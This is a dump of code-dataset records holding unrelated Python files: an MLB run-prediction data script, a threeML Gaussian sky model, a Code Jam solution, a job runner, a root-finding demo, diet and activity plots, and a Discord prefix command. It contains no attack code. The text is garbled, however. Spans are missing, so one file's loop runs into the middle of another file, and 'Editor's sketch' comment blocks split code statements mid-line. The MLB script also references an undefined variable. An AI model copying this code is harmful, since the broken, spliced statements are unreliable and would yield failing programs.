list(list(game_pitcher_bat_lineup_dic.values())[0].keys()))\r\n\r\ndef game_nan_index(column):\r\n indicies = []\r\n col_list = list(column.values)\r\n for i,game in enumerate(col_list): \r\n if game == 'nan':\r\n indicies.append(i)\r\n return indicies\r\n \r\ninde2 = game_nan_index(game_logs2['Expected_Runs'])\r\ngame_logs2['Expected_Runs'][inde1] = float(3.5)\r\n\r\n\r\nind = []\r\nfor i in range(17,34):\r\n ind.append(i)\r\nind1 = [] \r\nfor i in range(36,110):\r\n ind1.append(i)\r\nind2 = [4,6,7,8]+ind+ind1\r\n\r\nfor i in ind2:\r\n game_logs2.iloc[:, i] = game_logs2.iloc[:, i].astype(float)\r\n 
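
# --- Editor's sketch. The loop above flips a switch hitter ('S') to the
# side opposite the pitcher's throwing hand before choosing splits; the rule
# isolated as a helper:
def effective_bat_hand(bat_hand, pitcher_hand):
    # Switch hitters bat from the side opposite the pitcher.
    if bat_hand == "S":
        return "R" if pitcher_hand == "L" else "L"
    return bat_hand

assert effective_bat_hand("S", "L") == "R"
assert effective_bat_hand("S", "R") == "L"
assert effective_bat_hand("R", "L") == "R"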
game_logs2.iloc[:, i] = round(game_logs2.iloc[:, i],2)\r\n\r\ny = game_logs2['Runs'].astype(int)\r\nX = game_logs2.iloc[:,ind2]\r\nX1 = game_logs2.iloc[:,[1]+ind2]\r\n\r\nX.to_csv(\"C:/Users/mrcrb/PythonScripts/MLB/MLB/X_sort.csv\", sep=',', encoding='utf-8', index=False)\r\ny.to_csv(\"C:/Users/mrcrb/PythonScripts/MLB/MLB/y_sort.csv\", sep=',', encoding='utf-8', index=False)\r\nX1.to_csv(\"C:/Users/mrcrb/PythonScripts/MLB/MLB/X1_sort.csv\", sep=',', encoding='utf-8', index=False)\r\n\r\n\r\n# Compiling future game data that will be predicted\r\ndf5 = pd.read_csv(\"MLB/future_games.csv\", encoding='latin-1')\r\nones = pd.DataFrame(np.ones((len(df5),12)), columns = ['pitcher_IP', 'pitcher_PA', 'pitcher_SO', 'pitcher_DRA', 'pitcher_ERA', 'pitcher_PPF', 'pitcher_VORP', 'pitcher_FIP', 'pitcher_PVORP', 'pitcher_PWARP', 'pitcher_BASES_VS_AB', 'pitcher_hit_mult'])\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n\r\nfor d in df5['Pitcher']:\r\n for i in ['pitcher_IP', 'pitcher_PA', 'pitcher_SO', 'pitcher_DRA', 'pitcher_ERA', 'pitcher_PPF', 'pitcher_VORP', 'pitcher_FIP', 'pitcher_PVORP', 'pitcher_PWARP', 'pitcher_BASES_VS_AB', 'pitcher_hit_mult']:\r\n df5[i][df5['Pitcher']==d] = float(game_logs2[i][game_logs2['Team_Pitch'] == d.upper()].values[0])\r\n \r\n\r\n\r\nd_eff = ['def_H', 'def_HR',\t'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%']\r\nones = pd.DataFrame(np.ones((16,len(d_eff))), columns = ['def_H', 'def_HR',\t'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%'])\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n\r\ndf5['team_ini'] = df5['def_H']\r\n\r\nfor tm in df5['Team']:\r\n df5['team_ini'][df5['Team']==tm] = game_logs2['Stadium'][game_logs2['team']==tm].values[0]\r\n\r\n\r\ngl2 = game_logs2[['team_ini', 'def_H', 'def_HR', 'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%']]\r\n\r\nfor tm in df5['team_ini']:\r\n for i in ['def_H', 'def_HR', 'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%']:\r\n df5[i][df5['team_ini']==tm] = gl2[i][gl2['team_ini']==tm].values[0]\r\n\r\nfrom constant_variables import TEAMS\r\ndef get_team_ini(team_name):\r\n for name, ini in TEAMS.items():\r\n if name == team_name:\r\n return ini\r\n \r\ndf5['Team_Bat_Ini'] = [get_team_ini(x.upper()) for x in df5['Team_Bat']]\r\n\r\nbat_splits = ['bat_SO', 'bat_RBI', 'bat_DP', 'bat_FB%', 'bat_GB%', 'bat_LD%', 'bat_POP%', 'bat_ISO', 'bat_AVG', 'bat_OBP', 'bat_SLG', 'bat_TAV', 'batter_BASES_VS_AB',\t'hit_mult']\r\n\r\nones = pd.DataFrame(np.ones((16,len(bat_splits))), columns = ['bat_SO', 'bat_RBI', 'bat_DP', 'bat_FB%', 'bat_GB%', 'bat_LD%', 'bat_POP%', 'bat_ISO', 'bat_AVG', 'bat_OBP', 'bat_SLG', 'bat_TAV', 'batter_BASES_VS_AB',\t'hit_mult'])\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n'''\r\nfor tm,hd in zip(df5['Team_Bat_Ini'], df5['Throws']):\r\n for i in [ 'bat_SO', 'bat_RBI', 'bat_DP', 'bat_FB%', 'bat_GB%', 'bat_LD%', 'bat_POP%', 'bat_ISO', 'bat_AVG', 'bat_OBP', 'bat_SLG', 'bat_TAV', 'batter_BASES_VS_AB',\t'hit_mult']:\r\n df5[i][df5['Team_Bat_Ini']==tm][df5['Throws']==hd] = round(float(game_logs2[i][game_logs2['Team_Bat']==tm][game_logs2['pitcher_hand']==hd].values.mean()),2)\r\n'''\r\nfor tm,hd in zip(df5['Team_Bat_Ini'], df5['Throws']):\r\n for i in [ 'bat_SO', 'bat_RBI', 'bat_DP', 'bat_FB%', 'bat_GB%', 'bat_LD%', 'bat_POP%', 'bat_ISO', 'bat_AVG', 'bat_OBP', 'bat_SLG', 'bat_TAV', 'batter_BASES_VS_AB',\t'hit_mult']:\r\n df5[i][df5['Team_Bat_Ini']==tm] = round(float(game_logs2[i][game_logs2['Team_Bat']==tm][game_logs2['pitcher_hand']==hd].values.mean()),2)\r\n\r\n\r\n\r\ngl2 = game_logs2[['team_ini', 'def_H', 
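
# --- Editor's sketch. The fills above use chained indexing
# (df5[col][mask] = value), which pandas flags with SettingWithCopyWarning
# because it can silently write to a copy. The reliable form goes through
# .loc in a single step (frame contents illustrative):
import pandas as pd

df_demo = pd.DataFrame({"Pitcher": ["COLE", "SALE"], "pitcher_ERA": [1.0, 1.0]})
df_demo.loc[df_demo["Pitcher"] == "COLE", "pitcher_ERA"] = 2.75
print(df_demo)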
'def_HR', 'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%']]\r\n\r\nfor tm in df5['team_ini']:\r\n for i in ['def_H', 'def_HR', 'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%']:\r\n df5[i][df5['team_ini']==tm] = gl2[i][gl2['team_ini']==tm].values[0]\r\n\r\n\r\ntest, test2 = [], []\r\nfor tm,hd in zip(df5['Team_Bat_Ini'], df5['Throws']):\r\n for i in [ 'bat_SO', 'bat_RBI', 'bat_DP', 'bat_FB%', 'bat_GB%', 'bat_LD%', 'bat_POP%', 'bat_ISO', 'bat_AVG', 'bat_OBP', 'bat_SLG', 'bat_TAV', 'batter_BASES_VS_AB',\t'hit_mult']:\r\n test.append( round(float(game_logs2[i][game_logs2['Team_Bat']==tm][game_logs2['pitcher_hand']==hd].values.mean()),2))\r\n test2.append([i,tm,hd])\r\n\r\n\r\nbat_split = ['G_batter', 'PA_batter', 'R_batter', 'TB_batter', 'SO_batter', 'RBI_batter', 'DP_batter', 'FB%_batter', 'GB%_batter', 'LD%_batter', 'POP%_batter', 'ISO_batter', 'AVG_batter', 'OBP_batter', 'SLG_batter', 'TAV_batter', 'BASES_VS_AB_batter', 'SDTHB_BAT']\r\nones = pd.DataFrame(np.ones((16,len(bat_split))), columns = ['G_batter', 'PA_batter', 'R_batter', 'TB_batter', 'SO_batter', 'RBI_batter', 'DP_batter', 'FB%_batter', 'GB%_batter', 'LD%_batter', 'POP%_batter', 'ISO_batter', 'AVG_batter', 'OBP_batter', 'SLG_batter', 'TAV_batter', 'BASES_VS_AB_batter', 'SDTHB_BAT'])\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n\r\n\r\nfor tm,hd in zip(df5['Team_Bat_Ini'], df5['Throws']):\r\n for i in ['G_batter', 'PA_batter', 'R_batter', 'TB_batter', 'SO_batter', 'RBI_batter', 'DP_batter', 'FB%_batter', 'GB%_batter', 'LD%_batter', 'POP%_batter', 'ISO_batter', 'AVG_batter', 'OBP_batter', 'SLG_batter', 'TAV_batter', 'BASES_VS_AB_batter', 'SDTHB_BAT']:\r\n df5[i][df5['Team_Bat_Ini']==tm] = round(float(game_logs2[i][game_logs2['Team_Bat']==tm][game_logs2['pitcher_hand']==hd].values[0]),2)\r\n\r\n'''\r\nfor tm,hd in zip(df5['Team_Bat_Ini'], df5['Throws']):\r\n for i in ['G_batter', 'PA_batter', 'R_batter', 'TB_batter', 'SO_batter', 'RBI_batter', 'DP_batter', 'FB%_batter', 'GB%_batter', 'LD%_batter', 'POP%_batter', 'ISO_batter', 'AVG_batter', 'OBP_batter', 'SLG_batter', 'TAV_batter', 'BASES_VS_AB_batter', 'SDTHB_BAT']:\r\n df5[i][df5['Team_Bat_Ini']==tm][df5['Throws']==hd] = round(float(game_logs2[i][game_logs2['Team_Bat']==tm][game_logs2['pitcher_hand']==hd].values[0]),2)\r\n\r\n\r\nbatt, batt2 = [], []\r\nfor tm,hd in zip(df5['Team_Bat_Ini'], df5['Throws']):\r\n for i in ['G_batter', 'PA_batter', 'R_batter', 'TB_batter', 'SO_batter', 'RBI_batter', 'DP_batter', 'FB%_batter', 'GB%_batter', 'LD%_batter', 'POP%_batter', 'ISO_batter', 'AVG_batter', 'OBP_batter', 'SLG_batter', 'TAV_batter', 'BASES_VS_AB_batter', 'SDTHB_BAT']:\r\n batt.append( round(float(game_logs2[i][game_logs2['Team_Bat']==tm][game_logs2['pitcher_hand']==hd].values.mean()),2))\r\n batt2.append(i)\r\n'''\r\n\r\ngame_logs2['team_ini'][game_logs2['Team_Pitch']=='MATT HARVEY'] = 'CIN'\r\n\r\nside_pit_cols = ['H_SIDE_pit', '1B_SIDE_pit', '2B_SIDE_pit', '3B_SIDE_pit', 'HR_SIDE_pit', 'TB_SIDE_pit', 'SO_SIDE_pit', 'BB_SIDE_pit', 'HBP_SIDE_pit', 'SF_SIDE_pit', 'SH_SIDE_pit', 'DP_SIDE_pit', 'FB%_SIDE_pit', 'GB%_SIDE_pit', 'LD%_SIDE_pit', 'POP%_SIDE_pit', 'ISO_SIDE_pit', 'AVG_SIDE_pit', 'OBP_SIDE_pit', 'SLG_SIDE_pit', 'TAV_SIDE_pit', 'DRA_SIDE_pit', 'DRA-_SIDE_pit', 'CFIP_SIDE_pit', 'BASES_VS_AB_pit']\r\nones = pd.DataFrame(np.ones((16,len(side_pit_cols))), columns = side_pit_cols)\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n\r\nfor tm,hd in zip(df5['Pitcher'], df5['team_ini']):\r\n for i in side_pit_cols:\r\n df5[i][df5['Pitcher']==tm] = 
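
# --- Editor's sketch. The lookups above stack two boolean filters as
# df[mask1][mask2], which re-indexes twice; combining the masks with "&"
# selects in one pass (frame contents illustrative):
import pandas as pd

gl = pd.DataFrame({"Team_Bat": ["NYY", "NYY", "BOS"],
                   "pitcher_hand": ["L", "R", "L"],
                   "bat_AVG": [0.27, 0.25, 0.30]})
mask = (gl["Team_Bat"] == "NYY") & (gl["pitcher_hand"] == "L")
print(round(float(gl.loc[mask, "bat_AVG"].mean()), 2))  # -> 0.27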
round(float(game_logs2[i][game_logs2['Team_Pitch']==tm.upper()][game_logs2['team_ini']==hd].values[0]),2)\r\n\r\n\r\n\r\nbullpen_cat = ['K/9', 'BB/9', 'K/BB', 'HR/9', 'K%', 'BB%', 'K-BB%', 'AVG', 'WHIP', 'BABIP', 'LOB%',\r\n 'ERA-', 'FIP-', 'xFIP-', 'ERA', 'FIP', 'E-F', 'xFIP', 'SIERA']\r\nones = pd.DataFrame(np.ones((16,len(bullpen_cat))), columns = bullpen_cat)\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n\r\nfor tm,hd in zip(df5['Pitcher'], df5['team_ini']):\r\n for i in bullpen_cat:\r\n df5[i][df5['Pitcher']==tm] = round(float(game_logs2[i][game_logs2['Team_Pitch']==tm.upper()][game_logs2['team_ini']==hd].values[0]),2)\r\n\r\n\r\nmonster_cols = ['Expected_Runs', 'Temp', 'Humidity', 'Rain']\r\nones = pd.DataFrame(np.ones((16,len(bat_split))), columns = monster_cols)\r\ndf5 = pd.concat([df5,ones],axis=1)\r\n\r\nX_new = X[X.columns[list(X.columns).index('pitcher_SO'):]]\r\ndf5_new = df5[df5.columns[list(df5.columns).index('pitcher_SO'):]]\r\n\r\ndf5_new = df5_new.drop(['team_ini', 'Team_Bat_Ini', 'G_batter', 'PA_batter'], axis=1)\r\n\r\n\r\nX_new.to_csv(\"C:/Users/mrcrb/PythonScripts/MLB/MLB/X_new.csv\", sep=',', encoding='utf-8', index=False)\r\ndf5_new.to_csv(\"C:/Users/mrcrb/PythonScripts/MLB/MLB/df5_new.csv\", sep=',', encoding='utf-8', index=False)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nstats = {}\r\nfor i,j in zip(test2,test):\r\n if stats[i[0]] > 0:\r\n stats[i[0]]=[stats[i[0]],j]\r\n else:\r\n stats[i[0]]=j\r\n\r\ni,j=0,0\r\ntest3, test4= [],[]\r\nwhile j 89. or 2*maxSigma/np.cos(maxAbsDec*np.pi/180.) >= 180.:\n minRa = 0.\n maxRa = 360.\n else:\n minRa = self.parameters['RA0'].value - 2*maxSigma/np.cos(maxAbsDec*np.pi/180.)\n maxRa = self.parameters['RA0'].value + 2*maxSigma/np.cos(maxAbsDec*np.pi/180.)\n if minRa < 0.:\n minRa = minRa + 360.\n elif maxRa > 360.:\n maxRa = maxRa - 360.\n \n return minRa, maxRa, minDec, maxDec\n \n\n\nclass MultiVariateGaussian(SpatialModel):\n \n def setup(self):\n self.functionName = \"Multivariate Gaussian\"\n self.formula = r'$f(\\vec{x}) = \\left(\\frac{180^\\circ}{\\pi}\\right)^2 \\frac{1}{2\\pi \\sqrt{\\det{\\Sigma}}} \\, {\\rm exp}\\left( -\\frac{1}{2} (\\vec{x}-\\vec{x}_0)^\\intercal \\cdot \\Sigma^{-1}\\cdot (\\vec{x}-\\vec{x}_0)\\right) \\\\ \\vec{x}_0 = ({\\rm RA}_0,{\\rm Dec}_0)\\\\ \\Lambda = \\left( \\begin{array}{cc} \\sigma^2 & 0 \\\\ 0 & \\sigma^2 (1-e^2) \\end{array}\\right) \\\\ U = \\left( \\begin{array}{cc} \\cos \\theta & -\\sin \\theta \\\\ \\sin \\theta & cos \\theta \\end{array}\\right) \\\\\\Sigma = U\\Lambda U^\\intercal$'\n self.parameters = collections.OrderedDict()\n self.parameters['RA0'] = Parameter('RA0',1.,0,360,0.1,fixed=False,nuisance=False,dataset=None)\n self.parameters['Dec0'] = Parameter('Dec0',1.,-90,90,0.1,fixed=False,nuisance=False,dataset=None)\n self.parameters['sigma'] = SpatialParameter('sigma',0.1,0,10,0.01,fixed=False,nuisance=False,dataset=None)\n self.parameters['eccentricity'] = SpatialParameter('eccentricity',0.7,0,1,0.01,fixed=False,nuisance=False,dataset=None)\n self.parameters['angle'] = SpatialParameter('angle',0.,0,180,1.,fixed=False,nuisance=False,dataset=None)\n \n \n self.ncalls = 0\n \n \n def __call__(self,RA,Dec,energy):\n self.ncalls += 1\n RA0 = self.parameters['RA0'].value\n Dec0 = self.parameters['Dec0'].value\n sigma = self.parameters['sigma'].getValue(energy)\n eccentricity = self.parameters['eccentricity'].getValue(energy)\n angle = np.deg2rad(self.parameters['angle'].getValue(energy))\n \n \n sigma1=sigma**2\n sigma2=sigma1*(1-eccentricity**2)\n 
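
# --- Editor's sketch. getBoundaries() in the gaussian.py record above
# widens the RA search window by 1/cos(Dec), so the box keeps a fixed
# angular size on the sphere, and falls back to the full 0-360 range near
# the poles. That geometry in isolation (wraparound done with a modulo,
# which matches the record's +/-360 adjustments for a single wrap):
import numpy as np

def ra_window(ra0, max_abs_dec_deg, half_width_deg):
    scale = half_width_deg / np.cos(np.deg2rad(max_abs_dec_deg))
    if max_abs_dec_deg > 89.0 or 2 * scale >= 180.0:
        return 0.0, 360.0  # window degenerates near the pole
    return (ra0 - scale) % 360.0, (ra0 + scale) % 360.0

print(ra_window(10.0, 60.0, 4.0))  # cos(60 deg)=0.5 -> (2.0, 18.0)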
rot=np.array([[np.cos(angle),-np.sin(angle)],[np.sin(angle),np.cos(angle)]])\n cov=np.dot(rot,np.dot(np.array([[sigma1,0],[0,sigma2]]),rot.T))\n return np.maximum(np.power(180/np.pi,2)*scipy.stats.multivariate_normal.pdf(np.array([Dec,RA]).T, mean=np.array([RA0,Dec0]), cov=cov), 1e-30)\n \n def integratedFlux(self,energy):\n \n return 1.\n\n\n\n \n\n","sub_path":"threeML/models/spatialModels/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"276402325","text":"\nimport sys, math\ndef rs():\n return sys.stdin.readline().strip()\ndef ri():\n return int(sys.stdin.readline().strip())\ndef ras():\n return list(sys.stdin.readline().strip())\ndef rai():\n return map(int,sys.stdin.readline().strip().split())\ndef raf():\n return map(float,sys.stdin.readline().strip().split())\n\n\ndef easy(cond):\n\n arr = [0, 10, 29, 138, 337, 1436, 3435, 14434, 34433, 144432, 344431, 1444430, 3444429, 14444428, 34444427, 144444426, 344444425]\n\n def rdc(ch, l, t):\n count1 = 0\n count2 = 0\n swap = 0\n sc1 = ch[0:t]\n sc2 = ch[t:]\n if sc1 != \"1\" + \"0\"*(t-1):\n swap = 1\n count1 = int(sc1[::-1], 10) - 1\n if sc2 != \"0\"*(l-t-1) + \"1\":\n count2 = int(sc2, 10) - 1\n return count1 + count2 + swap + 1\n\n\n def red(chis):\n ich = int(chis)\n l = len(chis)\n if l == 1:\n return ich\n if ich == 10**(l-1):\n return arr[l-1]\n c = 0\n if chis[l-1] == \"0\":\n ich = ich - 1\n c += 1\n chis = str(ich)\n l = len(chis)\n if l % 2 == 0:\n return arr[l-1] + rdc(chis, l, l/2) + c\n else:\n res1 = arr[l-1] + rdc(chis, l, l/2) + c\n res2 = arr[l-1] + rdc(chis, l, l/2 + 1) + c\n return min(res1, res2)\n return red(cond)\n\n\nwith open('./A-small-attempt1.in', 'r') as cf:\n T =int(cf.readline().strip())\n for x in xrange(T):\n with open('./easy.resp', 'a') as cr:\n cr.write(\"Case #%s: %s\\n\"%((x+1), easy(cf.readline().strip())))\n\n\n","sub_path":"solutions_5688567749672960_0/Python/dolphinQ/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"580329673","text":"# standard libraries\nimport logging, os, time\nfrom enum import auto, Enum\nfrom importlib import import_module\nfrom typing import Dict, Sequence, Union\n\n# local libraries\nfrom db.db_creator import DBCreator\nfrom environ import ENV\n\n# third-party libraries\nimport pandas as pd\n\n\n# Initialize settings and global variables\nlogger = logging.getLogger(__name__)\n\nlogging.basicConfig(\n level=ENV.get('LOG_LEVEL', 'DEBUG'),\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n)\n\n\n# Enum(s)\n\n# Each job name should be defined in ValidJobName.\n# NAME_OF_JOB = 'path.to.method'\n\nclass ValidJobName(Enum):\n COURSE_INVENTORY = 'course_inventory.inventory.run_course_inventory'\n # ONLINE_MEETINGS = 'online_meetings.report...'\n # ZOOM = 'online_meetings.canvas_zoom_meetings...'\n # MIVIDEO = 'mivideo...'\n\n\n# Each data source name should be defined in ValidDataSourceName.\n# NAME_OF_DATA_SOURCE = auto()\n\nclass ValidDataSourceName(Enum):\n CANVAS_API = auto()\n UNIZIN_DATA_WAREHOUSE = auto()\n\n\n# Class(es)\n\nclass Job:\n\n def __init__(self, job_name: ValidJobName) -> None:\n self.name: str = job_name.name\n self.import_path: str = '.'.join(job_name.value.split('.')[:-1])\n self.method_name: str = job_name.value.split('.')[-1]\n self.started_at: Union[int, None] = None\n self.finished_at: 
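
# --- Editor's sketch. MultiVariateGaussian above builds its covariance as
# U diag(sigma^2, sigma^2*(1-e^2)) U^T with U a 2-D rotation, exactly as in
# its formula string. The construction checked against those eigenvalues
# (an observation only: the record's pdf call pairs points ordered
# [Dec, RA] with a mean ordered [RA0, Dec0], which looks inconsistent):
import numpy as np

def elliptical_cov(sigma, eccentricity, angle_rad):
    lam = np.diag([sigma ** 2, sigma ** 2 * (1.0 - eccentricity ** 2)])
    c, s = np.cos(angle_rad), np.sin(angle_rad)
    U = np.array([[c, -s], [s, c]])
    return U @ lam @ U.T

cov = elliptical_cov(0.1, 0.7, np.deg2rad(30.0))
print(np.sort(np.linalg.eigvalsh(cov)))  # -> [0.0051 0.01]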
Union[int, None] = None\n self.data_sources: Sequence[Dict[str, Union[str, pd.Timestamp]]] = []\n\n def create_metadata(self) -> None:\n started_at_dt = pd.to_datetime(self.started_at, unit='s')\n finished_at_dt = pd.to_datetime(self.finished_at, unit='s')\n\n job_run_df = pd.DataFrame({\n 'job_name': [self.name],\n 'started_at': [started_at_dt],\n 'finished_at': [finished_at_dt]\n })\n job_run_df.to_sql('job_run', db_creator_obj.engine, if_exists='append', index=False)\n logger.info(f'Inserted job_run record with finished_at value of {finished_at_dt}')\n job_run_id = pd.read_sql('job_run', db_creator_obj.engine).iloc[-1]['id']\n\n if len(self.data_sources) == 0:\n logger.warning('No valid data sources were identified')\n else:\n data_source_status_df = pd.DataFrame(self.data_sources)\n data_source_status_df = data_source_status_df.assign(**{'job_run_id': job_run_id})\n data_source_status_df.to_sql('data_source_status', db_creator_obj.engine, if_exists='append', index=False)\n logger.info(f'Inserted {len(data_source_status_df)} data_source_status records')\n\n def run(self) -> None:\n leaf_module = import_module(self.import_path)\n start_method = getattr(leaf_module, self.method_name)\n\n # Until we have a decorator for this\n self.started_at = time.time()\n data_sources = start_method()\n self.finished_at = time.time()\n\n delta = self.finished_at - self.started_at\n str_time = time.strftime('%H:%M:%S', time.gmtime(delta))\n logger.info(f'Duration of job run: {str_time}')\n\n valid_data_sources = []\n for data_source in data_sources:\n data_source_name = data_source['data_source_name']\n if data_source_name in ValidDataSourceName.__members__:\n valid_data_sources.append(data_source)\n else:\n logger.error(f'{data_source_name} is not a valid data source name')\n logger.error(f'No data_source_status record will be inserted.')\n\n self.data_sources = valid_data_sources\n self.create_metadata()\n\n\nclass JobManager:\n\n def __init__(self, job_names: Sequence[str]) -> None:\n self.jobs: Sequence[Job] = []\n for job_name in job_names:\n if job_name.upper() in ValidJobName.__members__:\n job_name_mem = ValidJobName[job_name.upper()]\n self.jobs.append(Job(job_name_mem))\n else:\n logger.error(f'{job_name} is not a valid job name; it will be ignored')\n\n def run_jobs(self) -> None:\n for job in self.jobs:\n logger.info(f'- - Running job {job.name} - -')\n job.run()\n\n\nif __name__ == '__main__':\n how_started = os.environ.get('HOW_STARTED', None)\n\n if how_started == 'DOCKER_COMPOSE':\n logger.info('Waiting for the MySQL turtle, hehe')\n # Wait for MySQL container to finish setting up\n time.sleep(30.0)\n\n # Apply any new migrations\n db_creator_obj = DBCreator(ENV['INVENTORY_DB'], ENV['APPEND_TABLE_NAMES'])\n db_creator_obj.migrate()\n\n # Run those jobs\n manager = JobManager(ENV['JOB_NAMES'])\n manager.run_jobs()\n","sub_path":"run_jobs.py","file_name":"run_jobs.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"487276426","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 1 06:45:05 2020\n\nIllustrates the false position method for root finding\n\n@author: zettergm\n\"\"\"\n\n\n# Imports\nimport numpy as np\nfrom nonlinear_fns import fun1 as f1\nimport matplotlib.pyplot as plt\n\n\n# Setup for iterations for a closed domain method\nmaxit=100\nminx=0\nmaxx=2*np.pi\ntol=1e-3\nverbose=True\n\n\n# Function we are finding roots 
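
# --- Editor's sketch. Job.run() in run_jobs.py above notes "Until we have a
# decorator for this" around its start/finish timestamps; a hedged sketch of
# that decorator, stashing the timestamps on the bound instance:
import functools
import time

def timed(method):
    @functools.wraps(method)
    def wrapper(self, *args, **kwargs):
        self.started_at = time.time()
        result = method(self, *args, **kwargs)
        self.finished_at = time.time()
        return result
    return wrapper

class Demo:
    @timed
    def work(self):
        time.sleep(0.01)

d = Demo()
d.work()
print(d.finished_at > d.started_at)  # -> True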
of\nx=np.linspace(minx,maxx,50)\ny=f1(x)\n\n\n# Initial interval spec\na0=np.pi/4\nb0=np.pi\na=a0\nb=b0\n\n\n# Interval halving iterations\nit=1\nconverged=False\nwhile(not (converged) and (it<=maxit)):\n c=(a+b)/2.0\n \n c=a-f1(a)/( (f1(b)-f1(a))/(b-a) )\n \n aprev=a\n bprev=b\n if (f1(a)*f1(c)<0.0): # we crossed zero so root is in this interval\n b=c\n left=True\n else:\n a=c\n left=False\n xnew=c\n fval=f1(xnew)\n converged=abs(fval) 1:\n# d[i][j] = 1\n labels = utilise.itemDict2list(dataGen4DietAct.genActTypeDict())\n \n\n# x = np.arange(d.shape[0])\n# plt.figure()\n# plt.stackplot(x,d[:,0],d[:,1],d[:,2],d[:,3],d[:,4],d[:,5],d[:,6],d[:,7])\n# plt.title('DailyActivityPattern_'+sub)\n# plt.xlabel('days')\n# plt.savefig('visDailyActTypePattStack/DailyActivityPattern_'+sub)\n \n# plt.figure()\n# x = np.arange(d.shape[0])\n# data = np.array([d[:,0],d[:,1],d[:,2],d[:,3],d[:,4],d[:,5],d[:,6],d[:,7]])\n# bottom = np.cumsum(data, axis=0)\n# colors = ('#ff3333', '#33ff33', '#3333ff', '#33ffff','#ff3333', '#33ff33', '#3333ff', '#33ffff')\n# plt.bar(x, data[0], color=colors[0])\n# for j in xrange(1, data.shape[0]):\n# plt.bar(x, data[1], color=colors[j], bottom=bottom[j-1])\n \n\n# colors = cycle('bgrcmykbgrcmykbgrcmykbgrcmyk')\n colors = plt.cm.Paired\n \n df = pd.DataFrame(d,columns=labels)\n ax = df.plot.bar(colormap=colors,stacked = True)\n plt.legend(bbox_to_anchor=(1.05,1), loc=2)\n plt.title('DailyActivityPattern_'+sub)\n plt.xlabel('days')\n plt.ylabel('frequency per day')\n data = dietActInfoRetrv.getDaysList(sub)\n ax.set_xticklabels(data)\n plt.savefig('visDailyActTypePattStack/DailyActivityPattern_'+sub,bbox_inches='tight')\n \n \n for sub in available_list:\n d = dataGen4DietAct.genDailySingleDietTypeTFArray(sub)\n \n# for i in range(d.shape[0]):\n# for j in range(d.shape[1]):\n# if d[i][j] > 1:\n# d[i][j] = 1\n labels = utilise.itemDict2list(dataGen4DietAct.genDietTypeDict())\n\n# x = np.arange(d.shape[0])\n# plt.figure()\n# plt.stackplot(x,d[:,0],d[:,1],d[:,2],d[:,3],d[:,4],d[:,5],d[:,6],d[:,7],d[:,8],d[:,9],d[:,10],d[:,11])\n# plt.title('DailyDietPattern_'+sub)\n# plt.xlabel('days')\n# plt.savefig('visDailyDietTypePattStack/DailyDietPattern_'+sub)\n \n colors = plt.cm.Paired\n \n df = pd.DataFrame(d,columns=labels)\n ax = df.plot.bar(colormap=colors,stacked = True)\n plt.legend(bbox_to_anchor=(1.05,1), loc=2) \n# df.plot.area()\n plt.title('DailyDietPattern_'+sub)\n plt.ylabel('frequency per day')\n plt.xlabel('days')\n data = dietActInfoRetrv.getDaysList(sub)\n ax.set_xticklabels(data)\n plt.savefig('visDailyDietTypePattStack/DailyDietPattern_'+sub,bbox_inches='tight')\n \nvisDailyPatternStack()\n","sub_path":"visDailyPattStack.py","file_name":"visDailyPattStack.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"464967193","text":"from discord.ext import commands\nimport discord\nimport tools\n\nclass Settings(commands.Cog):\n \"\"\"Commands for setting up the bot\"\"\"\n def __init__(self, bot):\n self.bot = bot\n self.database = bot.database\n\n @commands.command(name='prefix', aliases=[\"setprefix\"], usage=\"prefix \")\n @tools.has_perm(manage_guild=True)\n async def prefix(self, ctx, *, new_prefix: str = None):\n db = self.database.bot\n posts = db.serversettings\n prefix_org = \"\"\n\n async for x in posts.find({\"guild_id\": ctx.guild.id}):\n prefix_org = x[\"prefix\"]\n\n if new_prefix is None: # If command didn't specify a new prefix\n return await ctx.send(f\"The prefix is 
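
# --- Editor's sketch. The false-position record above is cut off mid-loop
# (text between '<' and '>' was evidently stripped from several records); a
# complete standalone regula falsi on a known root, for reference:
import math

def false_position(f, a, b, tol=1e-8, maxit=100):
    # Assumes f(a) and f(b) bracket a root (opposite signs).
    for _ in range(maxit):
        c = a - f(a) * (b - a) / (f(b) - f(a))
        if abs(f(c)) < tol:
            return c
        if f(a) * f(c) < 0.0:
            b = c
        else:
            a = c
    return c

print(false_position(math.sin, 2.0, 4.0))  # -> ~3.14159 (pi)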
